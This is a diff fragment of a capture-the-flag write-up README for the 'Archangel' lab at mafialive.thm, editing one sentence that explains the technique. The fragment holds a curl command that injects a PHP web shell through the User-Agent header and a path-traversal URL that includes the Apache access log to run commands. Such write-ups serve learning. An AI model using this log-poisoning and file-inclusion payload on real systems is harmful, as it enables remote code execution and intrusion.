realatharva15/archangel_writeup/README.md

 ```bash
 curl -A "<?php system(\$_GET['cmd']); ?>" http://mafialive.thm/
 ```
-we have injected the cmd parameter in the system, now lets test if the RCE is working or not.
+we have injected the cmd parameter as the User-Agent in the header, now lets test if the RCE is working or not.

 ```bash
 http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log&cmd=id